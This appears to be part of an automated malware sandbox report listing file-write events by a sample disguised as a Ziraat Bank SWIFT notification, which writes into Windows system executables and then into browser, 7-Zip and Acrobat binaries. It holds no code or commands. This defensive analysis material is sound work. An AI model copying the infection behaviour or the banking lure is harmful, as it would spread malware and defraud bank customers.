Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\Temp\aut9353.tmp offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\Temp\aut9353.tmp offset: 520192	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\Temp\unnervousness offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 95744	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 669260	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 672768	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 1220608	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 1221632	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 1224840	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 669184	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 53125	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\differences\niellist.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 767488	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1341004	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1344512	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1347720	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1340928	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 409168	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Windows\System32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2136576	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2710092	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2710016	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 1093484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 557056	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130572	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130496	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 382726	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 952832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 614020	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 700416	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273932	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273856	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 464916	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
